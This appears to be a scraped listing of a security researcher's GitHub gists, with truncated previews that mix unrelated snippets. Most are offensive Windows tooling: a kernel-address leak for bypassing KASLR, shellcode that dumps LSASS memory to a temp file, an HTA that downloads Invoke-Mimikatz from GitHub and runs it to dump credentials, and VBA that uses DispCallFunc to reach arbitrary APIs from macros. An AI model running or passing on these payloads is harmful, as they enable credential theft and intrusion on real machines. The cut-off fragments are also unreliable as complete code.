aaaddress1 / LeakNtKrnlAddr.ps1
Created September 26, 2023 03:16
Abuse EnumDeviceDrivers() to leak the load address of the Windows NT kernel (ntoskrnl.exe) from user mode — a well-known KASLR bypass usable from a medium-integrity process.
Add-Type -TypeDefinition @"
// ref: http://showlinkroom.me/2020/10/16/WindowKernelExploit01/
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
public static class EVD2
{
[DllImport("kernel32.dll")]
aaaddress1 / ExeMask.py
Last active April 6, 2024 05:16
Strip your personal compile info from Exe Files
import pefile, struct, sys
# Argument check: the script expects exactly one argument, the PE file to rewrite.
# Any other argument count prints the banner plus usage text and leaves via sys.exit(-1).
if len(sys.argv) != 2:
    for line in (
        "Strip your personal compile info from Exe Files by aaaddress1@chroot.org",
        f"Usage: {sys.argv[0]} [path/to/exe]",
    ):
        print(line)
    sys.exit(-1)
# Rewrite from pefile: https://github.com/erocarrera/pefile/blob/593d094e35198dad92aaf040bef17eb800c8a373/pefile.py#L3402
def mask_myRichHdr(in_pefile):
DANS = 0x536E6144 # 'DanS' as dword
aaaddress1 / shellcode64.c
Last active July 6, 2023 09:37
Windows 64bit Shellcode
// Roughly equivalent to: swprintf(commandLine, L"%i C:\\Windows\\Temp\\DumpLsass.log full", GetCurrentProcessId()); MiniDumpW(0, 0, commandLine);  (comsvcs!MiniDumpW takes a wide-char command line; note the call parentheses on GetCurrentProcessId)
char shellcode_selfDumpToTmp[] = "\xe9\x0c\x02\x00\x00\x90\x48\x89\xc8\x48\x8d\x49\x02\x66\x83\x38\x00\xb8\x00\x00\x00\x00\x74\x28\x0f\x1f\x84\x00\x00\x00\x00\x00\x44\x0f\xb7\x01\x48\x83\xc1\x02\x44\x89\xc2\x83\xca\x20\x0f\xb7\xd2\x01\xd0\xc1\xc8\x08\x66\x45\x85\xc0\x75\xe4\xc3\x0f\x1f\x00\xc3\x48\x89\xc8\x48\x8d\x49\x01\x80\x38\x00\xb8\x00\x00\x00\x00\x74\x26\x66\x0f\x1f\x44\x00\x00\x44\x0f\xb6\x01\x48\x83\xc1\x01\x44\x89\xc2\x83\xca\x20\x0f\xbe\xd2\x01\xd0\xc1\xc8\x08\x45\x84\xc0\x75\xe5\xc3\x0f\x1f\x40\x00\xc3\x65\x48\x8b\x04\x25\x60\x00\x00\x00\x48\x8b\x40\x18\x4c\x8b\x48\x20\x4c\x8d\x58\x20\x4d\x39\xcb\x74\x34\x48\x83\xec\x28\x41\x89\xca\xeb\x0c\x0f\x1f\x40\x00\x4d\x8b\x09\x4d\x39\xcb\x74\x18\x49\x8b\x49\x50\xe8\x55\xff\xff\xff\x44\x39\xd0\x75\xea\x49\x8b\x41\x20\x48\x83\xc4\x28\xc3\x90\x31\xc0\x48\x83\xc4\x28\xc3\x31\xc0\xc3\x57\x56\x53\x48\x83\xec\x20\x48\x63\x41\x3c\x8b\xb4\x01\x88\
aaaddress1 / rtVirusTotalScan.py
Last active February 1, 2023 05:29
Parse VirusTotal's Cuckoo-sandbox behaviour report for a given sample hash in real time
# can search sample's hash on virustotal by the following query:
# >>> {RANSOMWARE_FAMILY} and sandbox_name:virustotal_cuckoofork and engines:ransom
import sys
import requests
# Exactly one positional argument is expected: the hash of the sample to look up.
# Otherwise print the usage line and exit via sys.exit(-1).
if len(sys.argv) != 2:
    script = sys.argv[0]
    print(f"usage: {script} <sample-hash> by aaaddress1.\n")
    sys.exit(-1)

# VirusTotal v2 "file/behaviour" endpoint (the Cuckoo sandbox report).
# NOTE(review): the v2 API is the legacy interface; confirm it is still served
# before relying on it, and keep the API key this request presumably needs out of
# the source file (environment variable or config, not a literal).
url = 'https://www.virustotal.com/vtapi/v2/file/behaviour'
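#!/usr/bin/env bash
# Fetch a prebuilt nw.js (NW60, ARM64) from LeonardLaszlo's unofficial release,
# unpack the bundled Chromium-branded build and launch it on the local X display.
#
# Security / robustness notes:
# - The URL scheme is spelled out as https://. The original scheme-less
#   `//github.com/...` form is a browser-style protocol-relative link; wget has no
#   page origin to resolve it against, and a scheme-less URL would at best fall back
#   to plaintext http.
# - This is a third-party build of a browser engine and nothing here verifies a
#   checksum or signature. Treat the box as disposable, or pin a sha256 of the
#   archive once you have one you trust.
# - `set -euo pipefail` makes a failed download or extraction abort the script
#   instead of silently running whatever `./nw` happens to exist.
# - --ignore-gpu-blacklist re-enables GPU paths Chromium has disabled; it is kept
#   because the original presumably needs it for EGL rendering on this board.
set -euo pipefail

RELEASE_URL="https://github.com/LeonardLaszlo/nw.js-armv7-binaries/releases/download/nw60-arm64_2022-01-08/nw60-arm64_2022-01-08.tar.gz"
ARCHIVE="nw60-arm64_2022-01-08.tar.gz"

wget "$RELEASE_URL" -O "$ARCHIVE"
tar xvf "$ARCHIVE"
# The outer archive contains a second tarball with the actual nw.js build.
tar xvf usr/docker/dist/nwjs-chromium-ffmpeg-branding/nwjs-symbol-v0.60.1-linux-arm64.tar.gz
cd nwjs-v0.60.1-linux-arm64/
export DISPLAY=:0.0
./nw --use-gl=egl --ignore-gpu-blacklist --disable-accelerated-2d-canvas --num-raster-threads=2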
__int64 __fastcall LdrpInitialize(PCONTEXT threadCtx, IMAGE_DOS_HEADER *peImgToFix)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
currTeb = NtCurrentTeb();
while ( 1 )
{
loadStep = (unsigned int)_InterlockedCompareExchange(&LdrpProcessInitialized, 1, 0);
if ( (_DWORD)loadStep == 1 && (currTeb->SameTebFlags & 0x2000) == 0 )
goto done;
aaaddress1 / invokeMimikatz.hta
Created December 16, 2021 08:08
invokeMimikatz.hta
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
#include <windows.h>
#include <iostream>
bool readBinFile(const char fileName[], char*& bufPtr, DWORD& length) {
if (FILE* fp = fopen(fileName, "rb")) {
fseek(fp, 0, SEEK_END);
length = ftell(fp);
bufPtr = new char[length + 1];
fseek(fp, 0, SEEK_SET);
fread(bufPtr, sizeof(char), length, fp);
aaaddress1 / How to use a function pointer in VBA.md
Created November 18, 2021 15:26 — forked from sancarn/How to use a function pointer in VBA.md
How to use a function pointer in VBA by Akihito Yamashiro

VB6 and VBA come with no support for function pointers.

Also, when you call a function in a DLL through a `Declare` statement, you can only call functions that use the stdcall calling convention.

These constraints can be avoided by using the DispCallFunc API. DispCallFunc is widely used in VB6 (for example in code that clears IE history). Although it is documented as an API for invoking methods through an IUnknown-derived interface, it can also call plain, non-COM functions: pass NULL as the first argument (the instance pointer) and the "vtable offset" argument is then used directly as the function address. Note that this same trick is the standard way malicious Office macros reach arbitrary Win32 APIs, so a `Declare ... DispCallFunc` in VBA is a strong detection signal and will draw AV/EDR attention.

As explained in the MSDN documentation (http://msdn.microsoft.com/en-us/library/ms221473(v=vs.85).aspx), DispCallFunc's arguments are as follows.

aaaddress1 / x64FunctionPointer.vba
Created November 18, 2021 15:22 — forked from rmdavy/x64FunctionPointer.vba
x64FunctionPointerExample
' DispCallFunc (OleAut32) invokes a function address with a chosen calling convention
' and a packed array of VARIANT arguments. With pvInstance = 0 the offsetinVft value is
' used as a plain function pointer, which is how this module calls non-COM Win32
' exports from 64-bit VBA. NOTE(review): this is also the standard primitive malicious
' Office macros use to reach arbitrary APIs, so expect AV/EDR attention on real targets.
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As LongPtr, ByVal offsetinVft As LongPtr, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As LongPtr, ByRef retVAR As Variant) As Long
' Classic Win32 resolution pair: LoadLibraryA maps the DLL, GetProcAddress returns the
' address of a named export, which is then handed to DispCallFunc as offsetinVft.
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
' CALLCONV enum value for __stdcall (CC_STDCALL = 4), passed as CallConv.
Const CC_STDCALL = 4
' Parallel per-argument arrays (up to 64 arguments): VType holds the VARTYPE tag of
' each argument, VPtr the pointer to its value — presumably passed to DispCallFunc as
' paTypes / paValues by the helper that follows.
Private VType(0 To 63) As Integer, VPtr(0 To 63) As LongPtr
Sub SayHello()